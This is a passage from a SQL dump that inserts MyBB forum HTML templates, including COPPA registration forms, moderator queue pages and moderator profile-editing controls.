\'{$buddy[\'username\']}\');\" /> <img src=\"{$theme[\'imgdir\']}/buddy_online.gif\" alt=\"({$lang->online})\" title=\"{$lang->online}\" style=\"vertical-align: middle;\" /> {$buddy_name}</label></td> </tr>', '-2', '1400', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('521', 'xmlhttp_buddyselect_offline', ' <tr> <td class=\"trow1\" onmouseover=\"this.className=\'trow2\';\" onmouseout=\"this.className=\'trow1\';\"><label><input type=\"checkbox\" style=\"vertical-align: middle;\" id=\"checkbox_{$buddy[\'uid\']}\" onclick=\"UserCP.selectBuddy(\'{$buddy[\'uid\']}\', \'{$buddy[\'username\']}\');\" /> <img src=\"{$theme[\'imgdir\']}/buddy_offline.gif\" alt=\"({$lang->offline})\" title=\"{$lang->offline}\" style=\"vertical-align: middle;\" /> {$buddy_name}</label></td> </tr>', '-2', '1400', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('522', 'private_send_buddyselect', '<script type=\"text/javascript\"><!-- document.write(\'<br /><span class=\"smalltext\"><a href=\"#\" onclick=\"UserCP.openBuddySelect(\\\'{$buddy_select}\\\');\"><img src=\"{$theme[\'imgdir\']}/buddies.gif\" alt=\"\" style=\"vertical-align: middle;\" alt=\"\" title=\"{$lang->select_from_buddies}\" /> {$lang->select_from_buddies}</a></span>\'); // --></script>', '-2', '1400', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('523', 'forumdisplay_announcements_announcement_modbit', '<td align=\"center\" class=\"{$bgcolor}\">-</td>', '-2', '128', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('524', 'calendar_dayview_noevents', '<table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\"> <tr> <td class=\"trow1\">{$lang->no_events}</td> </tr> </table>', '-2', '1400', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('525', 'forumbit_depth2_forum_lastpost', '<span class=\"smalltext\"> <a href=\"{$lastpost_link}\" title=\"{$full_lastpost_subject}\"><strong>{$lastpost_subject}</strong></a> <br />{$lastpost_date} {$lastpost_time}<br />{$lang->by} {$lastpost_profilelink}</span> ', '-2', '1400', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('526', 'forumbit_depth1_forum_lastpost', '<span class=\"smalltext\"> <a href=\"{$lastpost_link}\" title=\"{$full_lastpost_subject}\"><strong>{$lastpost_subject}</strong></a> <br />{$lastpost_date} {$lastpost_time}<br />{$lang->by} {$lastpost_profilelink}</span> ', '-2', '1400', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('527', 'member_register_coppa', '<html> <head> <title>{$mybb->settings[\'bbname\']} - {$lang->coppa_compliance}</title> {$headerinclude} </head> <body> {$header} <br /> <form action=\"member.php\" method=\"post\"> <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\"> <tr> <td class=\"thead\"><strong>{$mybb->settings[\'bbname\']} - {$lang->coppa_compliance}</strong></td> </tr> <tr> <td class=\"trow1\"> {$lang->coppa_desc} <div style=\"width: 400px; margin: auto; margin-bottom: 15px;\"> <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\"> <tr> <td colspan=\"1\" class=\"thead\"><strong>{$lang->date_of_birth}</strong></td> </tr> <tr> <td class=\"trow1\"> <table cellpadding=\"4\" border=\"0\" align=\"center\"> <tr> <td class=\"smalltext\"><label for=\"day\">{$lang->day}:</label></td> <td class=\"smalltext\"><label for=\"month\">{$lang->month}:</label></td> <td class=\"smalltext\"><label for=\"year\">{$lang->year}:</label></td> </tr> <tr> <td> <select name=\"bday1\" id=\"day\"> <option value=\"\">&nbsp;</option> {$bdaysel} </select> </td> <td> <select name=\"bday2\" id=\"month\"> <option value=\"\">&nbsp;</option> <option value=\"1\" {$bdaymonthsel[\'1\']}>{$lang->month_1}</option> <option value=\"2\" {$bdaymonthsel[\'2\']}>{$lang->month_2}</option> <option value=\"3\" {$bdaymonthsel[\'3\']}>{$lang->month_3}</option> <option value=\"4\" {$bdaymonthsel[\'4\']}>{$lang->month_4}</option> <option value=\"5\" {$bdaymonthsel[\'5\']}>{$lang->month_5}</option> <option value=\"6\" {$bdaymonthsel[\'6\']}>{$lang->month_6}</option> <option value=\"7\" {$bdaymonthsel[\'7\']}>{$lang->month_7}</option> <option value=\"8\" {$bdaymonthsel[\'8\']}>{$lang->month_8}</option> <option value=\"9\" {$bdaymonthsel[\'9\']}>{$lang->month_9}</option> <option value=\"10\" {$bdaymonthsel[\'10\']}>{$lang->month_10}</option> <option value=\"11\" {$bdaymonthsel[\'11\']}>{$lang->month_11}</option> <option value=\"12\" {$bdaymonthsel[\'12\']}>{$lang->month_12}</option> </select> </td> <td> <input type=\"text\" class=\"textbox\" size=\"4\" maxlength=\"4\" name=\"bday3\" id=\"year\" value=\"{$mybb->input[\'bday3\']}\" /> </td> </tr> </table> <div class=\"smalltext\" style=\"text-align: center;\">{$lang->hide_dob}</div> </td> </tr> </table> </div> </td> </tr> </table> <br /> <div align=\"center\"> <input type=\"hidden\" name=\"action\" value=\"register\" /> <input type=\"submit\" class=\"button\" name=\"agree\" value=\"{$lang->continue_registration}\" /> </div> </form> {$footer} </body> </html>', '-2', '1400', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('528', 'member_coppa_form', '<html> <head> <title>{$mybb->settings[\'bbname\']} - {$lang->coppa_compliance}</title> <style type=\"text/css\"> body { font-family: Verdana, Arial, sans-serif; font-size: 13px; } .largetext, h1 { font-family: Verdana, Arial, sans-serif; font-size: medium; font-weight: bold; margin: 0; } .grey { color: #ccc; } dl { margin-left: 40px; } dt { width: 150px; float: left; clear: left; font-weight: bold; } dd { margin-bottom: 20px; margin-left: 150px; } dd.single { margin-left: 0; } input.textbox { border: 0; border-bottom: 1px solid #000; font-size: 16px; width: 350px; } input.date { width: 80px; } </style> </head> <body> <div style=\"float: right; text-align: center; padding-bottom: 10px;\" class=\"largetext\"> {$mybb->settings[\'bbname\']}<br /><span class=\"grey\">{$lang->coppa_registration}</span> </div> <div style=\"padding-bottom: 10px;\"><a href=\"index.php\"><img src=\"{$theme[\'logo\']}\" alt=\"{$mybb->settings[\'bbname\']}\" border=\"0\" /></a></div> <hr size=\"1\" style=\"clear: both;\" /> <p>{$lang->coppa_form_instructions}</p> <dl> <dt>{$lang->fax_number}</dt> <dd>{$mybb->settings[\'faxno\']}</dd> <dt>{$lang->mailing_address}</dt> <dd>{$mybb->settings[\'mailingaddress\']}</dd> </dl> <h1 style=\"clear: both;\" />{$lang->account_information}</h1> <dl> <dt><label for=\"username\">{$lang->username}</label></dt> <dd><input type=\"text\" class=\"textbox\" id=\"username\" /></dd> <dt><label for=\"email\">{$lang->email}</label></dt> <dd><input type=\"text\" class=\"textbox\" id=\"email\" /></dd> </dl> <h1 style=\"clear: both;\" />{$lang->parent_details}</h1> <dl> <dt><label for=\"name\">{$lang->full_name}</label></dt> <dd><input type=\"text\" class=\"textbox\" id=\"name\" /></dd> <dt><label for=\"relation\">{$lang->relation}</label></dt> <dd><input type=\"text\" class=\"textbox\" id=\"relation\" /></dd> <dt><label for=\"phone\">{$lang->phone_no}</label></dt> <dd><input type=\"text\" class=\"textbox\" id=\"phone\" /></dd> <dt><label for=\"parent_email\">{$lang->email}</label></dt> <dd><input type=\"text\" class=\"textbox\" id=\"parent_email\" /></dd> <dd class=\"single\">{$lang->coppa_parent_agreement}</dd> <dt><label for=\"signature\">{$lang->signature}</label></dt> <dd><input type=\"text\" class=\"textbox\" id=\"signature\" /> Date: <input type=\"text\" class=\"textbox date\" id=\"date\" /></dd> </dl> </body> </html>', '-2', '1400', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('529', 'member_register_agreement_coppa', '<tr> <td class=\"tcat\"><strong>{$lang->coppa_compliance}</strong></td> </tr> <tr> <td class=\"trow1\"> <p>{$lang->coppa_agreement_1}</p> <p>{$lang->coppa_agreement_2}</p> <p>{$lang->coppa_agreement_3}</p> </td> </tr>', '-2', '1400', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('530', 'modcp_modqueue_noresults', '<tr> <td class=\"trow1\" align=\"center\" colspan=\"{$colspan}\">{$lang->error_no_results}</td> </tr>', '-2', '1400', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('531', 'modcp_modqueue_threads', '<html> <head> <title>{$mybb->settings[\'bbname\']} - {$lang->threads_awaiting_moderation}</title> {$headerinclude} </head> <body> {$header} <form action=\"modcp.php\" method=\"post\"> <input type=\"hidden\" name=\"my_post_key\" value=\"{$mybb->post_code}\" /> <input type=\"hidden\" name=\"action\" value=\"do_modqueue\" /> <table width=\"100%\" border=\"0\" align=\"center\"> <tr> {$modcp_nav} <td valign=\"top\"> <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\"> <tr> <td class=\"thead\" colspan=\"3\"> <div class=\"float_right\"> <strong>{$lang->threads}</strong> | <a href=\"modcp.php?action=modqueue&amp;type=posts\">{$lang->posts}</a> | <a href=\"modcp.php?action=modqueue&amp;type=attachments\">{$lang->attachments}</a> </div> <strong>{$lang->threads_awaiting_moderation}</strong> </td> </tr> <tr> <td class=\"tcat\" width=\"50%\"><span class=\"smalltext\"><strong>{$lang->subject}</strong></span></td> <td class=\"tcat\" align=\"center\" width=\"25%\"><span class=\"smalltext\"><strong>{$lang->author}</strong></span></td> <td class=\"tcat\" align=\"center\" width=\"25%\"><span class=\"smalltext\"><strong>{$lang->date}</strong></span></td> </tr> {$threads} </table> {$multipage} {$mass_controls} <br /> <div align=\"center\"><input type=\"submit\" class=\"button\" name=\"reportsubmit\" value=\"{$lang->perform_actions}\" /></div> </td> </tr> </table> </form> {$footer} </body> </html>', '-2', '1400', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('532', 'modcp_modqueue_threads_thread', ' <tr> <td class=\"{$altbg}\"><a href=\"{$thread[\'threadlink\']}\">{$thread[\'subject\']}</a></td> <td class=\"{$altbg}\" align=\"center\">{$profile_link}</td> <td align=\"center\" class=\"{$altbg}\">{$threaddate}, {$threadtime}</td> </tr> <tr> <td class=\"{$altbg}\" colspan=\"3\"> <div class=\"modqueue_message\"> <div class=\"float_right modqueue_controls\"> <label class=\"label_radio_ignore\"><input type=\"radio\" class=\"radio radio_ignore\" name=\"threads[{$thread[\'tid\']}]\" value=\"ignore\" checked=\"checked\" /> {$lang->ignore}</label> <label class=\"label_radio_delete\"><input type=\"radio\" class=\"radio radio_delete\" name=\"threads[{$thread[\'tid\']}]\" value=\"delete\" /> {$lang->delete}</label> <label class=\"label_radio_approve\"><input type=\"radio\" class=\"radio radio_approve\" name=\"threads[{$thread[\'tid\']}]\" value=\"approve\" /> {$lang->approve}</label> </div> <div class=\"modqueue_meta\"> {$forum} </div> {$thread[\'postmessage\']} </div> </td> </tr> ', '-2', '1400', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('533', 'modcp_modqueue_posts', '<html> <head> <title>{$mybb->settings[\'bbname\']} - {$lang->posts_awaiting_moderation}</title> {$headerinclude} </head> <body> {$header} <form action=\"modcp.php\" method=\"post\"> <input type=\"hidden\" name=\"my_post_key\" value=\"{$mybb->post_code}\" /> <input type=\"hidden\" name=\"action\" value=\"do_modqueue\" /> <table width=\"100%\" border=\"0\" align=\"center\"> <tr> {$modcp_nav} <td valign=\"top\"> <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\"> <tr> <td class=\"thead\" colspan=\"3\"> <div class=\"float_right\"> <a href=\"modcp.php?action=modqueue&amp;type=threads\">{$lang->threads}</a> | <strong>{$lang->posts}</strong> | <a href=\"modcp.php?action=modqueue&amp;type=attachments\">{$lang->attachments}</a> </div> <strong>{$lang->posts_awaiting_moderation}</strong> </td> </tr> <tr> <td class=\"tcat\" width=\"50%\"><span class=\"smalltext\"><strong>{$lang->subject}</strong></span></td> <td class=\"tcat\" align=\"center\" width=\"25%\"><span class=\"smalltext\"><strong>{$lang->author}</strong></span></td> <td class=\"tcat\" align=\"center\" width=\"25%\"><span class=\"smalltext\"><strong>{$lang->date}</strong></span></td> </tr> {$posts} </table> {$multipage} {$mass_controls} <br /> <div align=\"center\"><input type=\"submit\" class=\"button\" name=\"reportsubmit\" value=\"{$lang->perform_actions}\" /></div> </td> </tr> </table> </form> {$footer} </body> </html>', '-2', '1400', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('534', 'modcp_modqueue_posts_post', ' <tr> <td class=\"{$altbg}\"><a href=\"{$post[\'postlink\']}#pid{$post[\'pid\']}\">{$post[\'subject\']}</a></td> <td class=\"{$altbg}\" align=\"center\">{$profile_link}</td> <td align=\"center\" class=\"{$altbg}\">{$postdate}, {$posttime}</td> </tr> <tr> <td class=\"{$altbg}\" colspan=\"3\"> <div class=\"modqueue_message\"> <div class=\"float_right modqueue_controls\"> <label class=\"label_radio_ignore\"><input type=\"radio\" class=\"radio radio_ignore\" name=\"posts[{$post[\'pid\']}]\" value=\"ignore\" checked=\"checked\" /> {$lang->ignore}</label> <label class=\"label_radio_delete\"><input type=\"radio\" class=\"radio radio_delete\" name=\"posts[{$post[\'pid\']}]\" value=\"delete\" /> {$lang->delete}</label> <label class=\"label_radio_approve\"><input type=\"radio\" class=\"radio radio_approve\" name=\"posts[{$post[\'pid\']}]\" value=\"approve\" /> {$lang->approve}</label> </div> <div class=\"modqueue_meta\"> {$forum}{$thread} </div> {$post[\'message\']} </div> </td> </tr> ', '-2', '1400', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('535', 'modcp_modqueue_attachments', '<html> <head> <title>{$mybb->settings[\'bbname\']} - {$lang->attachments_awaiting_moderation}</title> {$headerinclude} </head> <body> {$header} <form action=\"modcp.php\" method=\"post\"> <input type=\"hidden\" name=\"my_post_key\" value=\"{$mybb->post_code}\" /> <input type=\"hidden\" name=\"action\" value=\"do_modqueue\" /> <table width=\"100%\" border=\"0\" align=\"center\"> <tr> {$modcp_nav} <td valign=\"top\"> <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\"> <tr> <td class=\"thead\" colspan=\"6\"> <div class=\"float_right\"> <a href=\"modcp.php?action=modqueue&amp;type=threads\">{$lang->threads}</a> | <a href=\"modcp.php?action=modqueue&amp;type=posts\">{$lang->posts}</a> | <strong>{$lang->attachments}</strong> </div> <strong>{$lang->attachments_awaiting_moderation}</strong> </td> </tr> <tr> <td class=\"tcat\"><span class=\"smalltext\"><strong>{$lang->filename}</strong></span></td> <td class=\"tcat\" align=\"center\" width=\"20%\"><span class=\"smalltext\"><strong>{$lang->author}</strong></span></td> <td class=\"tcat\" align=\"center\" width=\"20%\"><span class=\"smalltext\"><strong>{$lang->date}</strong></span></td> <td class=\"tcat\" align=\"center\" colspan=\"3\"><span class=\"smalltext\"><strong>{$lang->controls}</strong></span></td> </tr> {$attachments} </table> {$multipage} {$mass_controls} <br /> <div align=\"center\"><input type=\"submit\" class=\"button\" name=\"reportsubmit\" value=\"{$lang->perform_actions}\" /></div> </td> </tr> </table> </form> {$footer} </body> </html>', '-2', '1400', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('536', 'modcp_modqueue_attachments_attachment', ' <tr> <td class=\"{$altbg}\"><a href=\"attachment.php?aid={$attachment[\'aid\']}\" target=\"_blank\">{$attachment[\'filename\']}</a> ({$attachment[\'filesize\']})<br /><small class=\"modqueue_meta\">Post: <a href=\"{$link}\">{$attachment[\'postsubject\']}</a></small></td> <td class=\"{$altbg}\" align=\"center\">{$profile_link}</td> <td align=\"center\" class=\"{$altbg}\">{$attachdate}, {$attachtime}</td> <td class=\"{$altbg}\" align=\"center\"><label class=\"label_radio_ignore\"><input type=\"radio\" class=\"radio radio_ignore\" name=\"attachments[{$attachment[\'aid\']}]\" value=\"ignore\" checked=\"checked\" /> {$lang->ignore}</label></td> <td class=\"{$altbg}\" align=\"center\"><label class=\"label_radio_delete\"><input type=\"radio\" class=\"radio radio_delete\" name=\"attachments[{$attachment[\'aid\']}]\" value=\"delete\" /> {$lang->delete}</label></td> <td class=\"{$altbg}\" align=\"center\"><label class=\"label_radio_approve\"><input type=\"radio\" class=\"radio radio_approve\" name=\"attachments[{$attachment[\'aid\']}]\" value=\"approve\" /> {$lang->approve}</label></td> </tr> ', '-2', '1400', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('537', 'modcp_editprofile', '<html> <head> <title>{$mybb->settings[\'bbname\']} - {$lang->edit_profile}</title> {$headerinclude} <script type=\"text/javascript\"> <!-- var mod_posts = \'{$modpost_check}\'; var susp_posts = \'{$suspost_check}\'; // --> </script> </head> <body> {$header} <form action=\"modcp.php\" method=\"post\"> <input type=\"hidden\" name=\"my_post_key\" value=\"{$mybb->post_code}\" /> <table width=\"100%\" border=\"0\" align=\"center\"> <tr> {$modcp_nav} <td valign=\"top\"> {$errors} <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\"> <tr> <td class=\"thead\" colspan=\"2\"><strong>{$lang->edit_profile}</strong></td> </tr> <tr> <td width=\"50%\" class=\"trow1\" valign=\"top\"> <fieldset class=\"trow2\"> <legend><strong>{$lang->profile_required}</strong></legend> <table cellspacing=\"0\" cellpadding=\"{$theme[\'tablespace\']}\"> <tr> <td><span class=\"smalltext\">{$lang->current_username}</span></td> </tr> <tr> <td><strong>{$profile_link}</strong></td> </tr> {$requiredfields} </table> </fieldset> <br /> <fieldset class=\"trow2\"> <legend><strong>{$lang->profile_optional}</strong></legend> <table cellspacing=\"0\" cellpadding=\"{$theme[\'tablespace\']}\"> <tr> <td colspan=\"3\"><span class=\"smalltext\"><label><input type=\"checkbox\" class=\"checkbox\" name=\"remove_avatar\" value=\"1\" /> {$lang->remove_avatar}</label></span></td> </tr> <tr> <td colspan=\"3\"><span class=\"smalltext\">{$lang->birthday}</span></td> </tr> <tr> <td> <select name=\"birthday_day\"> <option value=\"\">&nbsp;</option> {$bdaydaysel} </select> </td> <td> <select name=\"birthday_month\"> <option value=\"\">&nbsp;</option> <option value=\"1\" {$bdaymonthsel[\'1\']}>{$lang->month_1}</option> <option value=\"2\" {$bdaymonthsel[\'2\']}>{$lang->month_2}</option> <option value=\"3\" {$bdaymonthsel[\'3\']}>{$lang->month_3}</option> <option value=\"4\" {$bdaymonthsel[\'4\']}>{$lang->month_4}</option> <option value=\"5\" {$bdaymonthsel[\'5\']}>{$lang->month_5}</option> <option value=\"6\" {$bdaymonthsel[\'6\']}>{$lang->month_6}</option> <option value=\"7\" {$bdaymonthsel[\'7\']}>{$lang->month_7}</option> <option value=\"8\" {$bdaymonthsel[\'8\']}>{$lang->month_8}</option> <option value=\"9\" {$bdaymonthsel[\'9\']}>{$lang->month_9}</option> <option value=\"10\" {$bdaymonthsel[\'10\']}>{$lang->month_10}</option> <option value=\"11\" {$bdaymonthsel[\'11\']}>{$lang->month_11}</option> <option value=\"12\" {$bdaymonthsel[\'12\']}>{$lang->month_12}</option> </select> </td> <td> <input type=\"text\" class=\"textbox\" size=\"4\" maxlength=\"4\" name=\"birthday_year\" value=\"{$mybb->input[\'birthday_year\']}\" /> </td> </tr> <tr> <td colspan=\"3\"><span class=\"smalltext\">{$lang->website_url}</span></td> </tr> <tr> <td colspan=\"3\"><input type=\"text\" class=\"textbox\" name=\"website\" size=\"25\" maxlength=\"75\" value=\"{$mybb->input[\'website\']}\" /></td> </tr> </table> </fieldset> {$customfields} </td> <td width=\"50%\" class=\"trow1\" valign=\"top\"> <fieldset class=\"trow2\"> <legend><strong>{$lang->custom_usertitle}</strong></legend> <table cellspacing=\"0\" cellpadding=\"{$theme[\'tablespace\']}\"> <tr> <td><span class=\"smalltext\">{$lang->custom_usertitle_note}</span></td> </tr> <tr> <td><span class=\"smalltext\">{$lang->default_usertitle}</span></td> </tr> <tr> <td><span class=\"smalltext\"><strong>{$defaulttitle}</strong></span></td> </tr> <tr> <td><span class=\"smalltext\">{$lang->current_custom_usertitle}</span></td> </tr> <tr> <td><span class=\"smalltext\"><strong>{$user[\'usertitle\']}</strong></span></td> </tr> <tr> <td><span class=\"smalltext\">{$lang->new_custom_usertitle}</span></td> </tr> <tr> <td><input type=\"text\" class=\"textbox\" name=\"usertitle\" size=\"25\" maxlength=\"{$mybb->settings[\'customtitlemaxlength\']}\" value=\"{$newtitle}\" /></td> </tr> <tr> <td><span class=\"smalltext\"><input type=\"checkbox\" name=\"reverttitle\" id=\"reverttitle\" class=\"checkbox\" /> {$lang->revert_usertitle}</span></td> </tr> </table> </fieldset> <br /> <fieldset class=\"trow2\"> <legend><strong>{$lang->additional_contact_details}</strong></legend> <table cellspacing=\"0\" cellpadding=\"{$theme[\'tablespace\']}\"> <tr> <td><span class=\"smalltext\">{$lang->icq_number}</span></td> </tr> <tr> <td><input type=\"text\" class=\"textbox\" name=\"icq\" size=\"25\" value=\"{$mybb->input[\'icq\']}\" /></td> </tr> <tr> <td><span class=\"smalltext\">{$lang->aim_screenname}</span></td> </tr> <tr> <td><input type=\"text\" class=\"textbox\" name=\"aim\" size=\"25\" value=\"{$mybb->input[\'aim\']}\" /></td> </tr> <tr> <td><span class=\"smalltext\">{$lang->msn}</span></td> </tr> <tr> <td><input type=\"text\" class=\"textbox\" name=\"msn\" size=\"25\" value=\"{$mybb->input[\'msn\']}\" /></td> </tr> <tr> <td><span class=\"smalltext\">{$lang->yahoo_id}</span></td> </tr> <tr> <td><input type=\"text\" class=\"textbox\" name=\"yahoo\" size=\"25\" value=\"{$mybb->input[\'yahoo\']}\" /></td> </tr> </table> </fieldset> <br /> <fieldset class=\"trow2\"> <legend><strong>{$lang->moderation}</strong></legend> <table cellspacing=\"0\" cellpadding=\"{$theme[\'tablespace\']}\" width=\"100%\"> <tr> <td> <dl style=\"margin-top: 0; margin-bottom: 0;\"> <dt><label><input type=\"checkbox\" name=\"moderateposting\" value=\"1\" {$modpost_checked} class=\"checkbox\" onclick=\"toggleSuspend(\'modposts\');\" id=\"modpost\" /> {$lang->moderate_posts}</label></dt> <dd style=\"margin-top: 4px;\" id=\"modposts_action\"> <table cellpadding=\"4\"> {$moderateposts_info} <tr> <td width=\"35%\">{$lang->modpost_length}</td> <td><input type=\"text\" name=\"modpost_time\" value=\"{$mybb->input[\'modpost_time\']}\" class=\"textbox\" style=\"width: 2em;\" /> {$modpost_options}</td> </tr> </table> </dd> </dl> </td> </tr> <tr> <td> <dl style=\"margin-top: 0; margin-bottom: 0;\"> <dt><label><input type=\"checkbox\" name=\"suspendposting\" value=\"1\" {$suspost_checked} class=\"checkbox\" onclick=\"toggleSuspend(\'susposts\');\" id=\"suspost\" /> {$lang->suspend_posts}</label></dt> <dd style=\"margin-top: 4px;\" id=\"susposts_action\"> <table cellpadding=\"4\"> {$suspendposting_info} <tr> <td width=\"35%\">{$lang->suspost_length}</td> <td><input type=\"text\" name=\"suspost_time\" value=\"{$mybb->input[\'suspost_time\']}\" class=\"textbox\" style=\"width: 2em;\" /> {$suspost_options}</td> </tr> </table> </dd> </dl></td> </tr> </table> </fieldset> </td> </tr> <tr> <td colspan=\"2\" class=\"trow1\" valign=\"top\"> <fieldset class=\"trow1\"> <legend><strong>{$lang->signature}</strong></legend> <table cellspacing=\"0\" cellpadding=\"{$theme[\'tablespace\']}\"> <tr> <td class=\"trow1\" width=\"80%\"> <textarea rows=\"15\" cols=\"70\" id=\"signature\" name=\"signature\">{$user[\'signature\']}</textarea> {$codebuttons} </td> </tr> {$suspend_signature} </table> </fieldset> </td> </tr> <tr> <td colspan=\"2\" class=\"trow1\" valign=\"top\"> <fieldset class=\"trow2\"> <legend><strong>{$lang->mod_notes}</strong></legend> <textarea name=\"usernotes\" id=\"usernotes\" rows=\"10\" cols=\"70\">{$user[\'usernotes\']}</textarea> </fieldset> </td> </tr> </table> <br /> <div align=\"center\"> <input type=\"hidden\" name=\"action\" value=\"do_editprofile\" /> <input type=\"hidden\" name=\"uid\" value=\"{$user[\'uid\']}\" /> <input type=\"submit\" class=\"button\" value=\"{$lang->update_profile}\" /> </div> </td> </tr> </table> </form> {$footer} <script type=\"text/javascript\"> <!-- if(mod_posts == 0) { $(\'modposts_action\').hide(); } if(susp_posts == 0) { $(\'susposts_action\').hide(); } function toggleSuspend(action) { var item = action + \"_action\"; if(action == \"modposts\") { $(\'susposts_action\').hide(); $(\'suspost\').checked = false; if($(\"modpost\").checked == false) { $(\"modpost\").checked = false; $(\"modposts_action\").hide(); } else { $(\"modpost\").checked = true; $(\"modposts_action\").show(); } } if(action == \"susposts\") { $(\'modposts_action\').hide(); $(\'modpost\').checked = false; if($(\"suspost\").checked == false) { $(\"suspost\").checked = false; $(\"susposts_action\").hide(); } else { $(\"suspost\").checked = true; $(\"susposts_action\").show(); } } } // --> </script> </body> </html>', '-2', '1600', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('538', 'modcp_editprofile_signature', '<tr> <td class=\"trow1\" valign=\"top\"> <script type=\"text/javascript\"> <!-- var sig_checked = \"{$checked}\"; function toggleAction() { if($(\"suspend_action\").visible() == true) { $(\"suspend_action\").hide(); } else { $(\"suspend_action\").show(); } } // --> </script> <dl style=\"margin-top: 0; margin-bottom: 0; width: 100%;\"> <dt><label><input type=\"checkbox\" name=\"suspendsignature\" value=\"1\" class=\"checkbox\" {$checked_item} onclick=\"toggleAction();\" /> {$lang->suspend_signature}</label></dt> <dd style=\"margin-top: 4px;\" id=\"suspend_action\"> <table cellpadding=\"4\"> {$suspendsignature_info} <tr> <td width=\"30%\">{$lang->suspend_length}</td> <td><input type=\"text\" name=\"action_time\" value=\"{$mybb->input[\'action_time\']}\" class=\"textbox\" style=\"width: 2em;\" /> {$action_options}</td> </tr> </table> </dd> </dl> <script type=\"text/javascript\"> <!-- if(sig_checked == 0) { $(\"suspend_action\").hide(); } // --> </script> </td> </tr>', '-2', '1600', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('539', 'modcp_editprofile_select', '<select name=\"{$select_name}\"> {$selection_options} </select>', '-2', '1600', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('540', 'modcp_editprofile_select_option', '<option value=\"{$key}\" {$selected}>{$value}</option>', '-2', '1600', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('541', 'modcp_editprofile_suspensions_info', '<tr> <td colspan=\"2\" class=\"smalltext\"><em>{$suspension_info}</em></td> </tr>', '-2', '1600', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('542', 'modcp_finduser', '<html> <head> <title>{$mybb->settings[\'bbname\']} - {$lang->find_users}</title> {$headerinclude} </head> <body> {$header} <form action=\"modcp.php?action=finduser\" method=\"post\"> <table width=\"100%\" border=\"0\" align=\"center\"> <tr> {$modcp_nav} <td valign=\"top\"> <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\"> <tr> <td class=\"thead\" colspan=\"5\"><strong>{$lang->users}</strong></td> </tr> <tr> <td class=\"tcat\" width=\"30%\"><span class=\"smalltext\"><strong>{$lang->username}</strong></span></td> <td class=\"tcat\" align=\"center\" width=\"15%\"><span class=\"smalltext\"><strong>{$lang->usergroup}</strong></span></td> <td class=\"tcat\" align=\"center\" width=\"15%\"><span class=\"smalltext\"><strong>{$lang->regdate}</strong></span></td> <td class=\"tcat\" align=\"center\" width=\"15%\"><span class=\"smalltext\"><strong>{$lang->lastvisit}</strong></span></td> <td class=\"tcat\" align=\"right\" width=\"10%\"><span class=\"smalltext\"><strong>{$lang->postnum}</strong></span></td> </tr> {$users} </table> {$multipage} <br /> <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\"> <tr> <td class=\"thead\" colspan=\"2\"><strong>{$lang->find_users}</strong></td> </tr> <tr> <td class=\"trow1\" width=\"25%\"><strong>{$lang->username_contains}</strong></td> <td class=\"trow1\" width=\"75%\"><input type=\"text\" name=\"username\" id=\"username\" value=\"{$mybb->input[\'username\']}\" 